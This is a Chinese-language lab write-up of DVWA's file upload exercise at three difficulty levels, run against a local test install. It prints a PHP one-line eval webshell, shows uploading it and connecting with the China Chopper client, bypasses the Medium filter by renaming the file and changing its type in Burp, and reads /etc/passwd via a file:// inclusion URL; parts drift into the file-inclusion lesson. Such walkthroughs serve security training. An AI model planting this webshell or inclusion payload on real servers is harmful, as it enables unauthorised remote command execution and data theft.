DVWA 之文件上传漏洞

  • List item

Low

没有进行任何过滤


在这里插入图片描述

首相,上传一个phpinfo.php,其内代码如下:
<?php phpinfo(); ?>

上传路径:http://127.0.0.1/DVWA-1.9/hackable/uploads/phpinfo.php
然后访问

在这里插入图片描述

首先,写好

说明存在上传和执行漏洞

上传一句话木马:
<?php @eval($_POST[“hack”]); ?>
保存为hack.php
然后上传


在这里插入图片描述

找到文件上传目录

http://127.0.0.1/DVWA-1.9/hackable/uploads/hack.php

可以直接用hackbar这个插件,上传命令,爆出信息


在这里插入图片描述

使用菜刀连接


在这里插入图片描述

在这里插入图片描述

成功

Medium

有过滤


在这里插入图片描述

使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
同时,因为替换的只是“../”、“..\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
可以先在上传一个
此题要求,需要上传 .png或 .jpeg格式文件
因此,我们想到可以更改文件类型,然后上传
直接hack.php扩展名改为hack.png,然后上传,


在这里插入图片描述

可以上传成功,
使用菜刀连接
在这里插入图片描述

连接不上
制作图片码上传,同样如此
那么,可以使用burp抓包修改文件类型看看


在这里插入图片描述
在这里插入图片描述

成功

High

其过滤内容为


在这里插入图片描述

这个if语句的意思是如果page中不含有file并且page不等于include.php服务器才不会去包含相应的文件。两个条件只要不满足其中之一就可以,要么page等于include.php,要么page含有file。用file://流访问本地文件系统

http://127.0.0.1/DVWA-1.9/vulnerabilities/fi/?page=file:///etc/passwd

在这里插入图片描述

说明存在命令执行
上菜刀,结果发现无聊是如何,jar版本的死活连不上,使用windows .exe版本的可以,我也懵逼
在这里插入图片描述

在这里插入图片描述

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容